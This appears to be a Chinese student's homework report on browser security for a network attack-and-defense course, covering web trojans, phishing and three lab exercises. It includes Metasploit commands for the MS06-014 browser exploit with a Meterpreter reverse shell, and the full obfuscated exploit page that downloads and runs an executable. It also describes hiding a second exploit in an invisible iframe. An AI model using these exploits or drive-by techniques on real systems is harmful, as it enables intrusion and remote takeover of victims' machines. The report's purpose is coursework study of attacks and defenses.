20199125 2019-2020-2 《网络攻防实践》第十二周作业
一.概况
| 本次作业属于哪门课 | 网络攻防实践 |
|---|---|
| 作业要求 | 浏览器安全攻防 |
| 收获 | 对于JavaScript的一些基本使用方法有了了解,加深了对前端网页的设计理解 |
二、知识点总结
1.Web浏览器的安全威胁
1.1.现代Web浏览器的基本结构与机理
现代Web浏览器指的是符合“现代标准”,并被互联网用户所接受使用的Web浏览器软件,目前的现代Web浏览器要求能够理解并支持HTML和XHTML、CSS、ECMAScript及W3C DOM等一系列标准,其基本结构与各种功能特性的复杂性也已经大大增加。需要支持各种应用层协议的Stream流接收与解析,并维护DOM对象模型结构,通过支持EMCAScript标准构建JavaScript、Flash ActionScript等客户端脚本语言的执行环境,以及支持CSS标准控制页面布局,最终在浏览器终端中将服务器端的各种流媒体对象、应用程序、客户端脚本执行效果进行渲染,展现给终端用户。
现代Web浏览器软件除了在内核引擎中实现符合各种标准的基本功能和特性之外,普遍地采用各种扩展机制允许第三方开发一些插件,以提升浏览器软件功能的丰富性。下表显示了目前全球五个最主要的现代Web浏览器软件所采用的内核引繁与可扩展性机制情况,微软IE浏览器基于 Trident内核引擎(也被称为 MSHTML),在第一次浏览器战争过程中的1996年即采用了 Activex技术来支持第三方开发扩展插件,并沿用至今。Mozilla Firefox的内核引繁为 Gecko,通过XUL平台支持扩展插件开发。 Google Chrome和苹果的Safari都基于开源的 Webkit内核引擎, Opera基于的内核引擎为 Presto,这三款浏览器软件均于2010年才开始支持第三方扩展插件,Google Chrome可通过Xmlhttprequest和JSON机制来实现第三方扩展,而 Safari与 Opera则采用了标准化的 HTML5、CSS3与 Javascript支持第三方实现扩展插件。
除了扩展插件机制之外,现代Web浏览器还通过各种客户端脚本执行环境、独立沙箱运行环境和虚拟机,来支持构造具有桌面应用程序特性的富 Internet应用(RIA: Rich Internet Application),目前Adobe Flash/Flex、Java和微软Sliverlight是三种最普遍的RIA平台环境技术,帮助Web应用程序提供更友好的用户交互、客户端执行与展现效果。
1.2.Web浏览的安全问题与威胁
- Web浏览器软件的安全困境三要素:复杂性、可扩展性、连通性;
- Web浏览安全威胁位置:
- 针对传输网络的网络协议安全威胁:网络是连接Web应用服务端与客户端浏览环境的媒介,因此对于Web浏览端而言,与Web服务器端同样面临着网络传输协议安全攻击与威胁。
- 针对Web浏览端系统平台的安全威胁:互联网用户在浏览网页过程中所使用的浏览器软件、插件及相关应用程序都运行在桌面操作系统之上,桌面操作系统所存在的安全漏洞使得Web浏览环境存在着被攻击的风险。
- 针对Web浏览器软件及插件程序的滲透攻击威胁:随着防火墙、网络入侵防御系统等安全设备在网络边界上的部署,传统的针对服务器端的渗透攻击变得愈加困难,在这背景下,针对Web浏览器软件及插件程序的客户端渗透攻击在近几年来逐渐变得流行。
- 针对互联网用户的社会工程学攻击威胁:恶意攻击会利用进行Web浏览的互联网用户本身所存在的人性、心理等方面的弱点,实施社会工程学攻击。
2.Web浏览端的渗透攻击威胁---网页木马
2.1.网页木马安全威胁的产生背景
- 网页木马的产生于发展背景:网页木马是从恶意网页脚本所孕育和发展出来的;
- 网页木马发展与流行的驱动力---黑客地下经济链
- 网页木马存在的技术基础----Web浏览端安全漏洞
2.2.网页木马的机理分析
2.2.1.网页木马的定义特性
通过对网页木马起源背景和存在技术基础的分析,我们可以认知到网页木马从本质特性上是利用了现代Web浏览器软件中所支持的客户端脚本执行能力,针对Web浏览端软件安全漏洞实施客户端渗透攻击,从而取得在客户端主机的远程代码执行权限来植入恶意程序。因此从根本上分析,网页木马是针对Web浏览端软件实施的客户端滲透攻击代码,是对在针对服务器端软件的传统滲透攻击代码基础上的一种演进,针对服务器端软件的滲透攻击形式从网络攻击出现以来一直是主流。
基于上述分析,我们定义网页木马是对Web浏览端软件进行客户端渗透攻击的一类恶意移动代码,通常以网页脚本如JavaScript、VBScript实现,或以Flash、PDF等恶意构造的Web文件形式存在,通过利用Web浏览端软件中存在的安全漏洞,获得客户端计算机的控制权限以植入恶意程序。
2.2.2.对网页木马机理的全方位分析与理解
由于网页木马采用的是客户端渗透攻击的形式,就不可避免地需要Web浏览端软某访问构造的恶意Web页面内容,才可能触发滲透攻击过程。因此,与传统服务器端滲透攻击可以主动地进行网络扫描与攻击不同,网页木马的攻击是被动式的,需要通过一些技术方法来诱使互联网用户来访问网页木马页面此外在网页木马通过渗透攻击获得客户端计算机的远程代码执行权限之后,为了进行进一步的主机控制和敏感信息窃取,一般需要植入一些盗号木马等类型的恶意程序。因此实施网页木马攻击不像传统服务器端滲透攻击那么简单,往往涉及较为复杂的多步骤攻击场景,并需要多种类型的恶意代码及网络资源。
网页木马的特点:
- 多样化的客户端渗透攻击位置和技术类型
- 分布式、复杂的微观链接结构
- 灵活多变的混淆与对抗分析能力
2.2.3.网页挂马机制
- 内嵌HTML标签:第一类策略使用内嵌HTML标签,如iframe、frame等,将网页木马链接嵌入到网站首页或其他页面中;
- 恶意Script脚本:利用script脚本标签通过外部引用脚本的方式来包含网页木马;
- 内嵌对象链接:第三类网页挂马策略利用图片、Flash等内嵌对象中的特定方法来完成指定页面的加载,这种挂马技术能够产生出一些包含网页木马链接的图片或Flash文件,通过向一些允许用户上传图片和Flash文件的网站进行上传,从而造成这些网站特定页面被挂马危害的后果。
- ARP欺骗挂马:arp漆面挂马不需要真正地攻陷目标网站,在同一以太网网段内,攻击者通过ARP欺骗方法就可以进行中间人攻击,劫持所有目标网站出入的网络流量,并可在目标网站的HTML反馈包中注入任意的恶意脚本,从而使其成为将网络访问流量链接至网页木马的挂马站点。
2.3.4.混淆机制
- 将代码重新排版,去除缩进、空行、换行、注释等;
- 通过大小写变换、十六进制编码、escape编码、unicode编码等方法对网页木马进行编码混淆;
- 通过通用或定制的加密工具对网页木马进行加密得到密文,然后使用脚本语言中包含的解密函数进行解密,再使用document.Write()或eval()进行动态输出或执行;
- 利用字符串运算、数学运算或特殊函数混淆代码;
- 修改网页木马文件掩码欺骗反病毒软件,或对网页木马文件结构进行混淆,来伪装正常文件。
2.3.网页木马的检测与分析技术
- 基于特征码匹配的传统检测方法
- 基于统计与机器学习的静态分析方法
- 基于动态行为结果判定的检测分析方法
- 基于模拟浏览器环境的动态分析检测方法
- 网页木马检测分析技术综合对比
2.4.网页木马防范措施
应对网页木马最根本的防范措施与应对传统渗透攻击一样,就是提升操作系统与浏览端平台软件的安全性,可以采用操作系统本身提供的在线更新以及第三方软件所提供的常用应用软件更新机制,来确保所使用的计算机始终处于一种相对安全的状态:另外安装与实时更新一款优秀的反病毒软件也是应对网页木马威胁必不可少的环节,同时养成安全上网浏览的良好习惯,并借助于 Google安全浏览、 Site Advisor等站点安全评估工具的帮助避免访问那些可能遭遇挂马或者安全性不高的网站,可以有效地降低被网页木马滲透攻击的概率:最后,在目前网页木马威胁主要危害 Windows平台和IE浏览器用户的情况下,或许安装 Mac OS/ Linux操作系统,并使用 Chrome、 Safari、 Opera等冷门浏览器进行上网,做互联网网民中特立独行的少数派,可以有效地避免网页木马的侵扰。
3.解开网络钓鱼的黑幕
3.1.网络钓鱼技术概述
3.1.1网络钓鱼攻击的起源与发展
早期网络钓鱼攻击主要目的是获得受害者的AOL等网络服务账号的访问权,偶尔也期望获取信用卡数据以用于欺诈目的(如非法买卖这些信用卡信息)。这些钩鱼邮件通常利用一个简单的诡计来哄骗一些“菜鸟级”用户,这些欺骗手段很大程度依赖于受害者对“自动化的”系统功能或者权威机构的先天性信任,前面的例子中给出一个AOL硬件设备故障的情节,大部分的普通用户都会重视任何看起来正式的、或是为他们提供紧急帮助时所提的技术要求,同时用户通常会被催促尽快输入其敏感信息,从而避免遭受严重的后果。
3.1.2.中国的网络钓鱼攻击
随着中国互联网服务的日渐普遍,从2004年以来,网络钓鱼攻击也开始在中国大陆出现,出现了多次假冒银行、证券网站实施欺诈攻击的案例,著名的如“证券大盗”案件、假冒中国工商银行网站等。
3.2.网络钓鱼攻击的技术内幕
蜜网技术使得我们可以捕获这样一次典型网络钓鱼攻击整个生命周期中的详细数据,从中可以分析得出网络钓鱼攻击的普遍技术流程:
- 攻击者扫描网段,寻找存有漏洞的服务器
- 服务器被攻陷,并被安装一个Rootkit或口令保护的后门工具
- 攻击者从加密的后门工具获得对服务器的访问权,并下载已经构建完毕的钓鱼网站内容,进行一些网站搭建配置与测试工作,使得钓鱼网站上线运行
- 攻击者下载群发电子邮件工具,并大规模散发包含假冒钓鱼网站信息的欺骗性垃圾邮件
- 网页浏览的流量开始到达钓鱼网站,潜在的受害者开始访问假冒的钓鱼网页内容,并受欺骗给出个人敏感信息,攻击者通过服务器后台脚本收集这些个人敏感信息。
3.3.网络钓鱼攻击技术策略
首先钓鱼攻击者需要架设支撑钓鱼攻击的底层基础设施:为了隐藏自己躲避执法部门的追踪,他们都是通过从互联网上寻找被攻陷服务器来搭建钩鱼攻击网络,他们往往扫描互联网的IP地址空间以寻找潜在的存有漏洞的主机,并攻陷那些缺乏有效安全防护的服务器、甚至个人主机:有了服务器资源之后,他们就开始在上面架设钓鱼网站,包括假冒各种知名金融机构和在线电子商务网站的前台假冒钓鱼网站,以及后台用于收集、验证和发送用户输入敏感信息的脚本,使用最新的HTML页面编辑工具可以非常容易地构建出模仿目标组织机构的网站页面来,而有组织的网络钩鱼犯罪者甚至能够实时跟踪各个日标组织机构网站的更新,并在集中服务器上存放这些假冒钩鱼网站的构建内容及脚本,这样在攻陷一台服务器之后,通过执行少数几个命令,就可以很快地完成钓鱼网站的部署:此外我们也看到了钓鱼攻击者往往通过多级的端口重定向服务来架构一个规模庞大而复杂的钓鱼攻击网络,在多个攻陷服务器上设置端口重定向引诱受害用户访问钓鱼网站,而即使钓鱼网站被执法部门摧毁,他们开可以通过更新端口重定向服务的目标地址,来快速地恢复
钓鱼攻击网络的运行。
在构建完毕钓鱼网站之后,钓鱼攻击者最大的挑战是如何欺骗大量的互联网用户访问的钓鱼网站,除了技术层面上实施DNS中毒攻击或 Pharming网络流量重定向之外,目前更常见的就是通过各种自动化的社会工程学手段来构造欺骗性垃圾邮件或者信息,来实施撒网式的钓鱼攻击。一般采用境外的开放邮件服务器或者租借僵尸网络来发送这些欺骗邮件,使得执法部门难以追踪钧鱼者的踪迹,而邮件的发送源往往是冒充假冒钓鱼网站相对应的知名权威机构,发送内容中经常以各种安全性理由、紧急事件或者中奖信息,来欺骗用户访问其中包含的钩鱼网站链接,从而受欺骗给出个人敏感信息内容,具体的欺骗技巧包括:
- 在指向假冒网站的链接中使用IP地址代替域名
- 注册发音相近或形似的DNS域名,并在上面假设假冒网站
- 在一个假冒钓鱼网网站的电子邮件HTML内容中嵌入一些指向真实的目标网站链接,而少部分指向假冒的网站
- 对假冒网站的URL进行编码和混淆
- 企图攻击用户网页浏览器存在的漏洞,使之隐藏消息内容的实质
- 将假冒的钓鱼网站配置成记录用户提交的所有数据并进行不可察觉的日志,然后将用户重定向到真实的网站
- 架设一个假冒网站,作为目标机构真实网站的代理
- 通过恶意代码在受害者计算机上安装一个恶意的浏览器助手工具,然后由其将受害者重定向到假冒的钓鱼网站
- 使用恶意代码去修改受害者计算机上的用来维护DNS域名和IP地址映射的本地hosts文件,将合法域名跳转到假冒网站IP
3.4.网络钓鱼攻击的防范
①针对网络钓鱼过程中的电子邮件和即时通信信息欺诈,应该提高警惕性,对于以中奖、优惠、紧急状态等各种名义索収个人敏感信息的邮件一定要持怀疑态度,在未经认真核准的情况下,不要轻易相信并打来邮件中的链接。
②充分利用浏览器软件、网络安全厂商软件所提供的反钓鱼网站功能特性,如浏览器中对HTTPS安全登录链接的提示,地址栏中对访问网站域名的标黑高亮提示、对钓鱼网站的警告提示与举报功能。但同时又不能完全依赖于这些浏览器与网络安全软件的安全提示,对于进行关键的在线金融操作时,还需要靠个人的安全意识来辩别可能面对的新的钓鱼网站。
③在登录网上银行、证券基金等关键网站进行在线金融操作时,务必要重视访问网站的真实性,不要点击邮件中的链接来访问这些网站,最好以直接访问域名方式来访问,尽量使用硬件U盾来代替软证书或口令访问重要的金融网站。对网上银行异常动态提高警惕,如不小心在陌生的网址上输入了账户和密码,并遇到类似“系统维护”之类提示时,应立即拨打有关客服热线进行确认,万一资料被盗,应立即修改相关交易密码或进行银行证券交易卡挂失。
④最为重要的是,通过学习和修炼提升自己抵抗社会工程学攻击的能力,从而在日流行的撒网式钓鱼攻击中立于不败之地,因为撒网式钓鱼攻击不会采用复杂度很高的欺骗技巧,我们每个人都存在社会工程学攻击漏洞,只要比绝大多数人更懂得一些欺骗攻击技巧和相应的防范措施,并在实际过程中加以关注,就很难被撒网式钓鱼攻击所危害。
三、实践内容
1.动手实践——Web浏览器渗透攻击实验
实验步骤:
1.首先启动Metasploit,然后搜索漏洞MS06-014信息,执行use命令选择该漏洞
2.然后设置本地ip为攻击机ip,执行set Lhost 192.168.2.36,将恶意服务器地址配置为本机
3.最后设置载荷,这里选择使用常用的,执行set payload windows/meterpreter/reverse_tcp
4.启动攻击,然后生成了恶意链接,并建立了一个恶意服务器
5.将该恶意链接复制到靶机ie浏览器地址栏打开,然后会发现在攻击机上出现了反馈信息
6.查看会话列表,发现了靶机同攻击机建立的连接,然后执行sessions -i 1,选择该会话
7.成功实现远程控制了靶机,可对靶机输入命令执行
2.取证分析实践:剖析一个实际的网页木马攻击场景
1.由于题目附带的材料中给出的网址已经失效,无法还原真实的网页木马攻击场景,只能根据材料提供的一些文件来进行分析,首先用记事本打开start.htm,然后分析了一下,发现在该网页嵌入了一个内联框架,指向了一个网页new09.htm,且该内联框架高度宽度为0,不容易被发现
2.指向new09.htm网页使用的是相对路径,说明new09.htm应该是跟start.htm在同一个目录下,于是修改url,获取到new09.htm页面信息,分析,发现其通过内联框架指向了一个页面http://aa.18dd.net/aa/kl.htm,还使用script指向了另一个页面http://js.users.51.la/1299644.js
3.按照实验指导书步骤获取指向的两个网页内容以后打开分析,发现其中一个里面没有什么有用的信息,打开另外一个,发现里面很多信息,似乎被加密过,无法分析出有效信息,于是将整个网页信息复制到FreShow工具的内容框中(这是一个用于js加解密的工具),然后点击解码按钮,在下方的框中生成了解码后的信息,可以简单分析出使用了base64进行编码加密,密码为"script"
4.然后将其中一段复制到FreShow工具的内容框中(这段内容哪里来的没看懂,实验指导书上没写明白),进行解码,得到如下信息,显示有些错乱,经过整理后发现用到的应用程序漏洞有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、 暴风影音、PPStream 和百度搜霸的漏洞;最后还有一个下载恶意程序的行为。
5.然后打开材料提供好的1.js进行分析,同样将内容复制到FreShow工具的内容框中进行解码,然后生成信息如下图,该js文件下载了一个exe可执行文件
6.接下来使用同样的方法来分析b.js,但是发现使用FreShow根本无法解码,试了实验指导书上的解码网站,也无法访问,只能根据实验指导书解码的内容进行分析了;解码后的内容里有shellcode,可能是使用了该方式进行攻击。
7.由于要执行的exe文件已经在参考资料中提供,所以直接打开分析,首先使用peid打开bf.exe查看是否加壳,发现没有加壳,并且该程序是使用Delphi开发的
8.然后使用W32Dasm工具进行反编译,查看字符串信息,可以看到,该程序自启动了IE浏览器,并生成一个bat批处理文件,然后是执行了删除操作,删除一些文件,还从恶意网站下载了20个恶意程序到受害者主机上;shell\Auto\command=说明了该程序会自动执行shell指令,启动受害者主机目录下的一个程序;最后还发现了"瑞星卡卡上网安全助手 - IE 防漏墙","允许", "允许执行",这个应该是防止被杀毒软件查杀的设置。
9.参考资料里已经提供了这20个恶意程序,尝试着分析其中一个4.exe,首先使用peid打开,然后发现该程序已经加壳,然后再用超级巡警脱壳机进行脱壳,再用peid打开脱壳后的程序,发现还有一个壳"Morphine 1.2 - 1.3 -> rootkit",根据实验指导书上的解释,这是一个伪装壳,不需要管它,然后我尝试了使用IDA、W32Dasm等进行反汇编,发现提示缺少头文件,无法打开,最后使用的是C32Asm成功打开了脱壳之后的4.exe,然后查看字符串信息,看到关键信息"bat",似乎又执行的是批处理文件,但是具体内容无法分析出来,里面有很多乱码
10.由于无法分析恶意程序内容,只好在先尝试着运行这些恶意程序,下载了360卫士,将恶意程序拖到安全沙箱里运行,然后发现监测出了大量的木马和恶意程序,恶意程序在windows系统文件目录下生成了可执行程序和dll动态链接库文件
实践回答:
1.
2.使用了base64进行编码加密,密码为“script”,直接使用工具FreShow即可解密
3.MS06-014网马、暴风影音网马、PPStream网马、百度搜霸网马
4.解密后发现通过js中的指令从恶意站点下载了可执行文件,下载器即为bb/014.exe,执行该程序将从恶意站点down.18dd.net下载20个恶意程序
5.将执行恶意程序4.exe后在windows系统目录下生成的一个恶意木马提取出来,首先使用peid打开查看发现没有加壳,然后使用反汇编工具打开查看字符串信息,发现一个关键信息send,猜想可能是将受害者主机上的某些信息发送到目标地址,然后下面还有一个url信息,由于字符显示问题,并不能分析出该url指向何处。
3.攻防对抗实践:Web浏览器渗透攻防对抗
1.首先根据之前做过的ms06-014漏洞,在靶机访问metasploit里生成的链接,攻击机即可获取到会话,并且控制靶机;那么这一过程是如何实现的呢?我首先把靶机访问的链接的网页给保存下来,然后打开分析,发现该网页为了防止被杀毒软件查杀,对关键指令做了字符串拼接处理和使用了大量的空白和间隔。
2.进过去除无效回车符和空格后,我们得到了完整的网页信息,然后可以看到,该网页中的JavaScript使用了createObject,GetObject,Wscript.shell,
Adobe.stream等指令
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=GB2312">
<title></title>
<script language="javascript">
function
CtzoijGBqVnRPoW(o , n)
{
var r =null;
try
{
eval("r=o"+".C"+"re"+"ate"+"Ob" +"je"+"ct(n)"
)
}catch(e){}
if(!r)
{
try
{ eval("r=o"+".Cr"+"ea" +"teO"+"bj"+"ect(n,'')")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Cr"+"ea"+ "teO"+"bj"+"ect(n,'','')" )
}
catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"ject(n)" )
}catch(e){}
}
return(r);
}
function
CkziPkDEVvzcUK(a)
{
var s=CtzoijGBqVnRPoW(a,"W" +"Sc"+"ri" +"pt"+".S"+"he"+"ll");
var o=CtzoijGBqVnRPoW(a,"A" +"DO"+"D"+"B.S"+"tr"+"eam");
var e=s.Environment("P"+"ro"+"ce" +"ss" );
var url =document.location +'/p'+'ay'+'lo'+'ad';
var xml = null;
var bin =e.Item("T" + "E"+"M" + "P")+"\\fHEzfuTlSyw"+ ".e"+"xe";
var dat;
try
{
xml=new XMLHttpRequest();
}
catch(e)
{
try
{
xml=new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xml)
{
return(0);
}
xml.open("GET", url,false);
xml.send(null);
dat =xml.responseBody;
o.Type= 1 ;
o.Mode= 3 ;
o.Open();
o.Write(dat);
o.SaveToFile(bin,2);
s.Run(bin,0);
}
function
SmerREcbuXkUCwZbRyMEEfsRDDQRTeK()
{
var i=0;
var t=new Array( '{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}','{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}','{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}','{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}','{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}','{'+'0'<h+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}','{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}','{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}','{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}','{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}','{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}' ,null);
while(t[i])
{
var a=null;
if(t[i].substring(0,1)=='{')
{
a=document.createElement("object");
a.setAttribute("cl"+ "as"+"sid","cl"+"s"+"id" +":"+ t[i].substring(1,t[i].length-1 ));
}
else
{
try {
a=new ActiveXObject(t[i]);
}
catch(e){}
}
if (a)
{
try {
var b=CtzoijGBqVnRPoW(a ,"W"+"Sc"+ "ri"+"pt"+ ".S" +"he" + "ll" );
if(b)
{
CkziPkDEVvzcUK(a);
return(0);
}
}
catch(e){}
}
i++;
}
}
</script>
</head>
<body onload="SmerREcbuXkUCwZbRyMEEfsRDDQRTeK()">
kHNbbdThGhM
<div style="position: absolute; display: none; z-index: 9999;" id="livemargins_control">
<img src="0AYHSwSEujCe_files/monitor-background-horizontal.png" style="position: absolute; left: -77px; top: -5px;" width="77" height="5">
<img src="0AYHSwSEujCe_files/monitor-background-vertical.png" style="position: absolute; left: 0pt; top: -5px;">
<img id="monitor-play-button" src="0AYHSwSEujCe_files/monitor-play-button.png" onmouseover="this.style.opacity=1" onmouseout="this.style.opacity=0.5" style="position: absolute; left: 1px; top: 0pt; opacity: 0.5; cursor: pointer;">
</div>
</body>
</html>
然后可以看到,下图中使用js调用了document.location加载了payload,并且下一行中后面跟了一个可执行文件fHEzfuTlSyw.exe;猜想这个可执行文件应该是以攻击机为服务器,通过网页下载到靶机上的,而且为了躲避杀毒软件,每次加载恶意网页生成的可执行文件的名字是不一样的,同时打开靶机任务管理器查看正在运行的程序,果然发现了在网页源码中出现的那个可执行文件,这个应该是帮助攻击机获取靶机控制权限的恶意程序。
3.然后再往下分析整个页面,整个网页在访问的时候只会在<body>中出现随机的字符串,并没有什么奇怪的地方,刚开始并不清楚该如何将两个漏洞的攻击合并到一个恶意链接中,前面的挂马分析给了我灵感,是否可以通过metasploit利用其它浏览器漏洞再生成一个恶意链接,我们分析的这个恶意网页的内容主体中插入一个隐藏状态的<frame>内联框架,其中的链接指向新的恶意链接地址,然后将两个恶意网页放到攻击机apache的www目录下呢,尝试了一下使用另外一个漏洞极光,将生成的恶意链接放到内联框
4.然后将修改后的恶意网页放到www目录下,同时启动metasploit进行监听,依旧能够监听到会话,并且有多个会话
5.成功获取了靶机的控制权限。
四、遇到的问题
1.最后一个实践实在是不知道该如何下手,参考文档里提到的那个工具一直无法安装到Linux上面
2.老问题,Linux总是ip地址变化,弄得反弹木马ip经常失效,绑定静态ip地址就无法上网。
